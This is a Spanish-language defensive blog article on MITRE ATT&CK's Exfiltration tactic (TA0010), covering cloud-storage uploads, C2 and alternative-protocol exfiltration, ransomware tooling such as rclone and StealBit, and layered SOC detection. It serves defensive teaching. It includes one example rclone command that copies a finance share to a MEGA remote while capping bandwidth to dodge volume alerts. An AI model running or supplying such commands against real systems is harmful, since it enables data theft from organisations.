¿Cuál es el método de exfiltración más usado en ransomware?

Exfiltration Over Web Service (T1567): subir datos a servicios de cloud storage como MEGA, Dropbox o Google Drive usando herramientas como rclone. Es difícil de bloquear porque el tráfico va a servicios legítimos por HTTPS.

¿Cuántos datos exfiltran los grupos de ransomware?

Varía entre 10 GB y varios TB. LockBit affiliates exfiltran 100-500 GB de media. Cl0p en operaciones masivas (MOVEit) puede ser menos por víctima (10-100 GB) pero más víctimas simultáneas.

¿Cómo detectar exfiltración por cloud storage?

Proxy/firewall: monitorizar tráfico a MEGA, Dropbox, Google Drive desde servidores que normalmente no acceden a estos servicios. Detectar uso de rclone (Sysmon Event 1). Alertar sobre transferencias salientes > 1 GB fuera de horario laboral.

IntermedioMITRE ATT&CKExfiltrationDLPcloud storagedetección

Exfiltration (TA0010): Sacando Datos Fuera de la Red

Análisis de la táctica Exfiltration de MITRE ATT&CK (TA0010): técnicas de extracción de datos. Cloud storage, C2 channel, protocolos alternativos, scheduled transfer y detección de exfiltración en el SOC.

MalwareIntel Research·27 de mayo de 2026·5 min lectura

Serie: MITRE ATT&CK y D3FEND — Parte 13

Exfiltration es la extracción de datos fuera de la red de la víctima

La táctica Exfiltration (TA0010) documenta las técnicas que los adversarios usan para extraer datos recopilados del entorno comprometido. En ataques de doble extorsión es la fase que habilita la presión sobre la víctima: sin exfiltración, el atacante solo puede cifrar (y los backups anulan esa presión). En espionaje, la exfiltración ES el objetivo final.

Técnicas principales

T1567: Exfiltration Over Web Service

Subir datos a servicios web legítimos. La técnica dominante en ransomware moderno.

Sub-técnica	ID	Servicio	Herramienta
Exfiltration to Cloud Storage	T1567.002	MEGA, Dropbox, Google Drive, OneDrive	rclone, MEGAcmd, browser upload
Exfiltration to Code Repository	T1567.001	GitHub, GitLab	git push
Exfiltration to Text Storage	T1567.003	Pastebin, hastebin	curl, scripts

rclone es la herramienta favorita: CLI que soporta 40+ proveedores cloud, configurable, rápido y no requiere instalación.

Uso típico de rclone para exfiltración:
  rclone copy \\fileserver\Finance\ mega:exfil/finance --transfers 4 --bwlimit 10M
  
  --transfers 4: 4 archivos en paralelo
  --bwlimit 10M: limitar ancho de banda para evitar alertas de volumen

Detección:

Sysmon Event 1: rclone.exe ejecutándose (renombrado frecuentemente a nombres legítimos)
Sysmon Event 3: conexiones salientes a mega.nz, *.dropbox.com, *.googleapis.com desde servidores
Proxy: volumen de upload anómalo a cloud storage
Config file: rclone.conf contiene tokens de autenticación al servicio cloud

T1041: Exfiltration Over C2 Channel

Enviar datos a través del canal C2 existente (Cobalt Strike, Sliver, etc.). Más lento que cloud storage pero no requiere herramientas adicionales ni conexiones a nuevos destinos.

Ventaja atacante: no genera tráfico a destinos nuevos (solo al C2 ya establecido). Desventaja atacante: ancho de banda limitado del canal C2, detectable por volumen anómalo en la conexión C2.

Detección: Incremento súbito en el volumen de datos enviados al C2 (de KB de beaconing a GB de exfiltración).

T1048: Exfiltration Over Alternative Protocol

Usar protocolos diferentes al C2 para exfiltrar.

Sub-técnica	ID	Protocolo	Detección
Exfil over Symmetric Encrypted Non-C2	T1048.001	HTTPS a servidor diferente del C2	Conexión nueva a IP sin historial
Exfil over Asymmetric Encrypted Non-C2	T1048.002	SSH, SFTP a servidor externo	Conexiones SSH salientes anómalas
Exfil over Unencrypted Non-C2	T1048.003	FTP, HTTP plano, DNS	FTP saliente, DNS con datos codificados

T1029: Scheduled Transfer

Exfiltrar datos en horarios específicos, frecuentemente fuera del horario laboral para evitar detección o durante picos de tráfico para camuflarse.

Detección: Transferencias regulares programadas fuera de horario a destinos externos.

T1030: Data Transfer Size Limits

Fragmentar la exfiltración en paquetes pequeños para evitar alertas de volumen. En vez de subir 100 GB de una vez, subir 1 GB cada hora durante 4 días.

Detección: Requiere análisis de tendencia: volumen acumulado saliente a un destino durante días, no solo picos instantáneos.

T1052: Exfiltration Over Physical Medium

Copiar datos a USB, disco externo u otro medio físico. Relevante en ataques internos (insider threat) o entornos air-gapped.

Detección: DLP de endpoint: alertar sobre copia de volúmenes grandes a medios removibles.

T1537: Transfer Data to Cloud Account

Transferir datos a una cuenta cloud controlada por el atacante dentro del mismo proveedor cloud de la víctima (ej: copiar S3 bucket a otra cuenta AWS).

Detección: CloudTrail (AWS), Activity Log (Azure): operaciones de copia cross-account.

Herramientas de exfiltración observadas en incidentes

Herramienta	Servicio	Frecuencia en ransomware
rclone	MEGA, Dropbox, S3, GDrive	Muy alta
MEGAcmd / megatools	MEGA	Alta
FileZilla	FTP/SFTP	Media
WinSCP	SCP/SFTP	Media
StealBit (LockBit)	Infraestructura propia	Alta (LockBit specific)
ExMatter (BlackCat)	Infraestructura propia	Media (BlackCat specific)
Cobalt Strike download	C2 channel	Alta
curl / wget	HTTP/HTTPS	Baja

Estrategia de detección

Capa 1: Proxy / Firewall (red)

Alertar sobre:
- Tráfico a mega.nz, *.dropboxusercontent.com desde servidores
- Upload > 500 MB a cualquier cloud storage desde endpoint corporativo
- Conexiones SFTP/SCP salientes no autorizadas
- Tráfico DNS con entropy alta (DNS exfiltration)

Capa 2: DLP (contenido)

Alertar sobre:
- Archivos con clasificación sensible saliendo del perímetro
- Archivos comprimidos con contraseña (no inspeccionables)
- Volumen acumulado > 5 GB a destino externo en 24h

Capa 3: Endpoint (Sysmon/EDR)

Alertar sobre:
- Ejecución de rclone.exe (o renombrado con hash conocido)
- Ejecución de megatools, megacmd
- Archivos .7z/.rar creados en %TEMP% seguidos de conexión saliente
- Proceso que lee masivamente de shares de red + conexión saliente

Capa 4: Cloud (CASB/CloudTrail)

Alertar sobre:
- Compartición externa de archivos en OneDrive/SharePoint
- Nuevas aplicaciones OAuth con permisos de lectura
- Cross-account data transfer (AWS S3 copy)

Timeline de detección

Mejor momento para detectar exfiltración:

ANTES (Collection/Staging):
  → Acceso anómalo a shares (ventana: días)
  → Archivos comprimidos en ubicaciones temporales

DURANTE (Exfiltration activa):
  → Tráfico a cloud storage (ventana: horas-días)
  → Volumen saliente anómalo

DESPUÉS (demasiado tarde para prevenir):
  → Datos ya fuera de la red
  → Solo queda respuesta a incidentes y notificación

Conclusión

Exfiltration es la fase que convierte el compromiso en daño tangible (pérdida de datos, doble extorsión). rclone + MEGA/Dropbox dominan en ransomware. La detección combina proxy (tráfico a cloud storage), DLP (volumen y contenido), y endpoint (ejecución de herramientas de exfiltración). La última táctica, Impact, es lo que ocurre después de que los datos están fuera.

Fuentes y referencias

MITRE ATT&CK: Exfiltration (TA0010)
Coveware: "Ransomware Data Exfiltration Trends" (2025)
Mandiant: "Tracking Data Theft in Intrusions" (2024)
SANS: "Detecting Data Exfiltration with Network Forensics"